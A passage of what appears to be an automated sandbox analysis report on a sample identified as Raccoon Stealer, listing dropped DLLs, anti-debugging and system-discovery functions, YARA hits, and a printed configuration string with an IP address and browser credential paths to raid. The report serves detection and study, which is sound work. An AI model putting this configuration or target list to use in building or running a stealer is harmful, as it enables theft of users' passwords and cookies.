Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleMarshal.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssdbm3.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy_InUse.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-private-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32_InUse.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\qipcap.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\lgpllibs.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\prldap60.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\breakpadinjector.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\IA2Marshal.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\libEGL.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssckbi.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldap60.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldif60.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-multibyte-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleHandler.dll Jump to dropped file
Is looking for software installed on the system
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Registry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_00437819 __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA, 1_2_00437819
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0043EFDD FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, 1_2_0043EFDD
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ Jump to behavior

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0045C559 IsDebuggerPresent,OutputDebugStringW, 1_2_0045C559
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0042A2F9 GetVersionExW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary, 1_2_0042A2F9
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_00433882 __EH_prolog,DeleteFileA,CreateFileA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetFileSize,GetProcessHeap,HeapAlloc,lstrlenA,lstrlenA,lstrcpynA,lstrcpynA,lstrlenA,lstrcpynA,ReadFile,lstrlenA,lstrcpynA,WinHttpSetOption,WinHttpSetOption,WinHttpSetOption,WinHttpConnect,WinHttpConnect,WinHttpOpenRequest,WinHttpOpenRequest,WinHttpSendRequest,WinHttpReceiveResponse,WinHttpQueryDataAvailable,WinHttpReadData,WinHttpCloseHandle,WinHttpCloseHandle,CloseHandle,DeleteFileA,WinHttpCloseHandle,GetProcessHeap,HeapFree, 1_2_00433882
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0045A03D mov eax, dword ptr fs:[00000030h] 1_2_0045A03D
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0045A081 mov eax, dword ptr fs:[00000030h] 1_2_0045A081
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0045A0B2 mov eax, dword ptr fs:[00000030h] 1_2_0045A0B2
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_00446C01 mov eax, dword ptr fs:[00000030h] 1_2_00446C01
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_00446625 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00446625
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_00440B62 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00440B62
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_00440CC5 SetUnhandledExceptionFilter, 1_2_00440CC5

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK Jump to behavior

Language, Device and Operating System Detection:

barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: __EH_prolog,CoInitialize,GetUserDefaultLCID,GetLocaleInfoA,Sleep,Sleep,GetUserNameA,Sleep,_strlen,_strlen,CreateThread,CreateThread,CreateThread,CreateThread,StrToIntA,CreateThread,CreateThread,WaitForSingleObject,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,CreateThread,GetModuleHandleA,FreeLibrary,WaitForSingleObject,lstrlenA,lstrlenA,GetEnvironmentVariableA,ShellExecuteA,ShellExecuteA,CoUninitialize, 1_2_0042C383
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA, 1_2_00437819
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 1_2_00462391
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: EnumSystemLocalesW, 1_2_00458577
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: GetLocaleInfoW, 1_2_0046258C
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: EnumSystemLocalesW, 1_2_0046267E
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: EnumSystemLocalesW, 1_2_00462633
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: EnumSystemLocalesW, 1_2_00462719
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 1_2_004627A4
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: GetLocaleInfoW, 1_2_004629F7
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 1_2_00462B1D
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: GetLocaleInfoW, 1_2_00458BA4
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: GetLocaleInfoW, 1_2_00462C23
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 1_2_00462CF2
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_00440985 cpuid 1_2_00440985
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0043E03E GetLocalTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 1_2_0043E03E
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_004371FA __EH_prolog,GetUserNameA,GetTimeZoneInformation,std::ios_base::_Ios_base_dtor, 1_2_004371FA
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0042A2F9 GetVersionExW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary, 1_2_0042A2F9
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0042C383 __EH_prolog,CoInitialize,GetUserDefaultLCID,GetLocaleInfoA,Sleep,Sleep,GetUserNameA,Sleep,_strlen,_strlen,CreateThread,CreateThread,CreateThread,CreateThread,StrToIntA,CreateThread,CreateThread,WaitForSingleObject,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,CreateThread,GetModuleHandleA,FreeLibrary,WaitForSingleObject,lstrlenA,lstrlenA,GetEnvironmentVariableA,ShellExecuteA,ShellExecuteA,CoUninitialize, 1_2_0042C383

Stealing of Sensitive Information:

barindex
Yara detected Raccoon Stealer
Source: Yara match File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.5d0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.5d0e50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.326614932.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.297061443.0000000002200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe PID: 7124, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327203361.0000000002D10000.00000004.00000001.sdmp String found in binary or memory: {"_id":"45FBKXwB3dP17SpzZps0","au":"/l/f/45FBKXwB3dP17SpzZps0/adb13c803533173abdcd87ee671f425ca0cf7b67","ls":"/l/f/45FBKXwB3dP17SpzZps0/9b41c3b8b157b1c7fef44a61865b03447a89e8d1","ip":"185.189.150.72","location":{"country":"Switzerland","country_code":"CH","state":"Zurich","state_code":"ZH","city":"Zurich","zip":8001,"latitude":47.3664,"longitude":8.5546},"c":{"m":null,"t":null,"lu":null},"lu":null,"rm":1,"is_screen_enabled":0,"is_history_enabled":0,"depth":3,"s":[{"k":"edge","v":"28;Microsoft Edge;\\Microsoft\\Edge\\User Data;Login Data;Cookies;Web Data"},{"k":"chrome","v":"28;Google Chrome;\\Google\\Chrome\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeBeta","v":"28;Google Chrome Beta;\\Google\\Chrome Beta\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeSxS","v":"28;Google Chrome SxS;\\Google\\Chrome SxS\\User Data;Login Data;Cookies;Web Data"},{"k":"chromium","v":"28;Chromium;\\Chromium\\User Data;Login Data;Cookies;Web Data"},{"k":"xpom","v":"28;Xpom;\\Xpom\\User Data;Login Data;Cookies;Web Data"},{"k":"comodo","v":"28;Comodo Dragon;\\Comodo\\Dragon\\User Data;Login Data;Cookies;Web Data"},{"k":"amigo","v":"28;Amigo;\\Amigo\\User Data;Login Data;Cookies;Web Data"},{"k":"orbitum","v":"28;Orbitum;\\Orbitum\\User Data;Login Data;Cookies;Web Data"},{"k":"bromium","v":"28;Bromium;\\Bromium\\User Data;Login Data;Cookies;Web Data"},{"k":"brave","v":"28;Brave;\\BraveSoftware\\Brave-Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"nichrome","v":"28;Nichrome;\\Nichrome\\User Data;Login Data;Cookies;Web Data"},{"k":"rockmelt","v":"28;RockMelt;\\RockMelt\\User Data;Login Data;Cookies;Web Data"},{"k":"360browser","v":"28;360Browser;\\360Browser\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"vivaldi","v":"28;Vivaldi;\\Vivaldi\\User Data;Login Data;Cookies;Web Data"},{"k":"go","v":"28;Go;\\Go!\\User Data;Login Data;Cookies;Web Data"},{"k":"sputnik","v":"28;Sputnik;\\Sputnik\\Sputnik\\User Data;Login Data;Cookies;Web Data"},{"k":"kometa","v":"28;Kometa;\\Kometa\\User Data;Login Data;Cookies;Web Data"},{"k":"uran","v":"28;Uran;\\uCozMedia\\Uran\\User Data;Login Data;Cookies;Web Data"},{"k":"qipSurf","v":"28;QIP Surf;\\QIP Surf\\User Data;Login Data;Cookies;Web Data"},{"k":"epicprivacy","v":"28;Epic Privacy;\\Epic Privacy Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"coccoc","v":"28;CocCoc;\\CocCoc\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"centbrowser","v":"28;CentBrowser;\\CentBrowser\\User Data;Login Data;Cookies;Web Data"},{"k":"7star","v":"28;7Star;\\7Star\\7Star\\User Data;Login Data;Cookies;Web Data"},{"k":"elements","v":"28;Elements;\\Elements Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"torbro","v":"28;TorBro;\\TorBro\\Profile;Login Data;Cookies;Web Data"},{"k":"suhba","v":"28;Suhba;\\Suhba\\User Data;Login Data;Cookies;Web Data"},{"k":"saferbrowser","v":"28;Safer Browser;\\Safer Technologies\\Secure Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"mustang","v":"28;Mustang;\\Rafotech\\Must
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327203361.0000000002D10000.00000004.00000001.sdmp String found in binary or memory: {"_id":"45FBKXwB3dP17SpzZps0","au":"/l/f/45FBKXwB3dP17SpzZps0/adb13c803533173abdcd87ee671f425ca0cf7b67","ls":"/l/f/45FBKXwB3dP17SpzZps0/9b41c3b8b157b1c7fef44a61865b03447a89e8d1","ip":"185.189.150.72","location":{"country":"Switzerland","country_code":"CH","state":"Zurich","state_code":"ZH","city":"Zurich","zip":8001,"latitude":47.3664,"longitude":8.5546},"c":{"m":null,"t":null,"lu":null},"lu":null,"rm":1,"is_screen_enabled":0,"is_history_enabled":0,"depth":3,"s":[{"k":"edge","v":"28;Microsoft Edge;\\Microsoft\\Edge\\User Data;Login Data;Cookies;Web Data"},{"k":"chrome","v":"28;Google Chrome;\\Google\\Chrome\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeBeta","v":"28;Google Chrome Beta;\\Google\\Chrome Beta\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeSxS","v":"28;Google Chrome SxS;\\Google\\Chrome SxS\\User Data;Login Data;Cookies;Web Data"},{"k":"chromium","v":"28;Chromium;\\Chromium\\User Data;Login Data;Cookies;Web Data"},{"k":"xpom","v":"28;Xpom;\\Xpom\\User Data;Login Data;Cookies;Web Data"},{"k":"comodo","v":"28;Comodo Dragon;\\Comodo\\Dragon\\User Data;Login Data;Cookies;Web Data"},{"k":"amigo","v":"28;Amigo;\\Amigo\\User Data;Login Data;Cookies;Web Data"},{"k":"orbitum","v":"28;Orbitum;\\Orbitum\\User Data;Login Data;Cookies;Web Data"},{"k":"bromium","v":"28;Bromium;\\Bromium\\User 